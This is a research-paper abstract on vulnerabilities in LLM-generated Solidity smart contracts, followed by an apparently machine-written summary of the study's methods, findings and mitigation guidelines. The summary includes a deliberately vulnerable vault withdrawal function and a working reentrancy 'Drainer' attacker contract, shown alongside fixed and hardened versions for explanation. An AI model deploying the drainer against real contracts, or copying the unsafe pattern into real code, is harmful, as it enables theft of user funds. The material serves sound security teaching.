Evaluating the Vulnerability Landscape of LLM-Generated Smart Contracts
Large language models (LLMs) have been widely adopted in modern software development lifecycles, where they automate and assist code generation, significantly improving developer productivity and reducing development time. In the blockchain domain, developers increasingly rely on LLMs to generate and maintain smart contracts, the immutable, self-executing components of decentralized applications. Because deployed smart contracts cannot be modified, correctness and security are paramount, particularly in high-stakes domains such as finance and governance. Despite this growing reliance, the security implications of LLM-generated smart contracts remain insufficiently understood. In this work, we conduct a systematic security analysis of Solidity smart contracts generated by state-of-the-art LLMs, including ChatGPT, Gemini, and Claude Sonnet. We evaluate these contracts against a broad set of known smart contract vulnerabilities to assess their suitability for direct deployment in production environments. Our extensive experimental study shows that, despite their syntactic correctness and functional completeness, LLM-generated smart contracts frequently exhibit severe security flaws that could be exploited in real-world settings. We further analyze and categorize these vulnerabilities, identifying recurring weakness patterns across different models. Finally, we discuss practical countermeasures and development guidelines to help mitigate these risks, offering actionable insights for both developers and researchers. Our findings aim to support safe integration of LLMs into smart contract development workflows and to strengthen the overall security of the blockchain ecosystem against future failures.
💡 Research Summary
The paper investigates the security properties of Solidity smart contracts automatically generated by state‑of‑the‑art large language models (LLMs). The authors focus on three widely used general‑purpose LLMs—ChatGPT (GPT‑4.1), Gemini‑2.5, and Claude Sonnet‑4.5—because these are the models most developers interact with in everyday coding tasks. To emulate realistic development workflows, the researchers design a set of natural‑language prompts that describe typical blockchain applications such as ERC‑20 token contracts, decentralized autonomous organization (DAO) voting mechanisms, auctions, marketplaces, and social‑network‑style contracts. For each application domain they create 5‑10 distinct prompts, yielding a corpus of roughly 30 contracts per model.
The generation pipeline is deliberately simple: a prompt is sent to the LLM, the model returns raw Solidity source code, the code is compiled, and a minimal functional test suite is run to ensure basic correctness. No further manual editing is performed before the security assessment, mirroring a “generate‑and‑deploy” scenario that many developers might adopt when they trust the model’s output.
Security evaluation proceeds in two stages. First, the authors run static analysis tools (Slither, SmartCheck) against a curated list of 30 well‑known vulnerability patterns derived from the SWC registry, covering reentrancy, integer overflow/underflow, missing access control, timestamp dependence, proxy upgrade flaws, and others. Second, they complement static checks with dynamic analysis and fuzzing (VulnSEE, Manticore) to capture runtime‑only issues. Each contract is thus labeled with the number and severity of discovered flaws.
Results show that while all three LLMs produce syntactically correct code with a high compilation success rate (≈ 85 % of contracts compile without errors), security is far from guaranteed. On average, each contract contains 3.7 critical vulnerabilities. Reentrancy is the most prevalent defect, appearing in 68 % of the generated contracts. The root cause is the models' tendency to emit low‑level call{value: ...} or transfer statements without applying the canonical "checks‑effects‑interactions" pattern. Access‑control omissions are also common: modifiers such as onlyOwner are either defined but never applied, or msg.sender checks are written incorrectly, allowing unauthorized parties to invoke privileged functions. Although Solidity 0.8.x includes built‑in overflow checks, the models sometimes omit the pragma version or place arithmetic inside unchecked blocks, re‑introducing overflow risk.
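To illustrate the reentrancy pattern described above, the following hypothetical vault contract (a sketch for this summary, not code from the paper) shows both the vulnerable ordering the models tend to emit and the checks‑effects‑interactions fix:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

contract Vault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // VULNERABLE: the external call happens before the state update,
    // so an attacker's fallback can re-enter and withdraw repeatedly.
    function withdrawUnsafe() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
        balances[msg.sender] = 0; // effect happens too late
    }

    // FIXED (checks-effects-interactions): zero the balance (effect)
    // before making the external call (interaction).
    function withdrawSafe() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");      // check
        balances[msg.sender] = 0;                         // effect
        (bool ok, ) = msg.sender.call{value: amount}(""); // interaction
        require(ok, "transfer failed");
    }
}
```

The only difference between the two functions is the position of the state update relative to the external call, which is exactly the defect class the paper reports as most prevalent.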
Model‑specific observations reveal distinct bias patterns. ChatGPT tends to generate code that follows the latest Solidity style guides and includes up‑to‑date pragma statements, yet it frequently mishandles complex multi‑step logic, leading to logical errors that are not caught by simple unit tests. Gemini‑2.5 often repeats variable and function declarations, inflating gas consumption and making static analysis noisier. Claude Sonnet‑4.5 is aggressive in satisfying prompt constraints, inserting many redundant require statements; this can cause condition inversion bugs where the intended guard is accidentally negated.
From these findings the authors construct an "LLM‑Induced Vulnerability Taxonomy" comprising seven layers: (1) structural skeleton flaws, (2) missing or misapplied access control, (3) reentrancy exposure, (4) arithmetic errors, (5) uninitialized state variables, (6) uncontrolled external calls, and (7) gas‑optimization neglect. Each layer maps to specific code patterns observed across models and domains, and the taxonomy serves as a checklist for auditors reviewing AI‑generated contracts.
The threat model assumes an attacker who monitors newly deployed contracts and exploits any of the identified weaknesses immediately after deployment, before the contract’s assets can be secured or the code can be upgraded. Attack scenarios include draining token balances via reentrancy, hijacking governance by bypassing owner checks, and causing denial‑of‑service through unchecked loops.
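The reentrancy‑drain scenario in this threat model can be sketched with a minimal, hypothetical attacker contract (assumed names; not from the paper) targeting a vault whose withdraw function makes its external call before zeroing the caller's balance:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

interface IVault {
    function deposit() external payable;
    function withdrawUnsafe() external;
}

// Hypothetical attacker: its receive() re-enters withdrawUnsafe()
// while the victim still records a non-zero balance for it.
contract Drainer {
    IVault public immutable vault;

    constructor(address vaultAddr) {
        vault = IVault(vaultAddr);
    }

    function attack() external payable {
        vault.deposit{value: msg.value}();
        vault.withdrawUnsafe(); // kicks off the re-entrant loop below
    }

    receive() external payable {
        // Keep re-entering while the vault still holds enough ether.
        if (address(vault).balance >= msg.value) {
            vault.withdrawUnsafe();
        }
    }
}
```

Because the contract is immutable once deployed, a monitoring attacker can run this loop immediately after deployment, before any off‑chain response is possible.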
To mitigate these risks, the paper proposes a set of practical guidelines: (i) always run both static and dynamic analysis on LLM‑generated code; (ii) embed explicit security directives in the prompt (e.g., request nonReentrant modifiers, require onlyOwner on privileged functions); (iii) enforce the use of the latest Solidity compiler version and strict pragma settings; (iv) expand test suites to cover edge cases, especially around state changes and external calls; (v) maintain a model‑specific “vulnerability fingerprint” database to inform prompt engineering; (vi) perform thorough test‑net deployment and penetration testing before main‑net launch; (vii) when using upgradeable proxy patterns, add additional validation logic to guard the upgrade function itself.
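Guidelines (ii) and (iii) can be made concrete with a hardened version of a withdrawal contract. This sketch assumes OpenZeppelin's Ownable and ReentrancyGuard (real, widely used libraries; the contract itself is hypothetical and illustrative only):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/utils/ReentrancyGuard.sol";

contract GuardedVault is Ownable, ReentrancyGuard {
    mapping(address => uint256) public balances;

    constructor() Ownable(msg.sender) {}

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // nonReentrant blocks re-entrant calls even if the
    // checks-effects-interactions ordering were ever broken.
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balances[msg.sender] = 0;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }

    // Privileged function explicitly guarded by onlyOwner,
    // as the prompt-level security directives recommend.
    function sweep(address payable to) external onlyOwner {
        to.transfer(address(this).balance);
    }
}
```

Requesting exactly these modifiers (nonReentrant, onlyOwner) in the prompt is the kind of explicit security directive the authors recommend embedding in LLM interactions.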
In conclusion, the study demonstrates that while LLMs dramatically accelerate smart‑contract development, the current generation quality is insufficient for direct, production‑grade deployment without a rigorous security review pipeline. The authors call for tighter integration of automated security tools into AI‑assisted development workflows, better prompt engineering practices, and heightened awareness among developers about the unique threat surface introduced by AI‑generated blockchain code. This work fills a gap in the literature by systematically quantifying LLM‑induced vulnerabilities in smart contracts and offering concrete steps to safeguard the rapidly expanding blockchain ecosystem.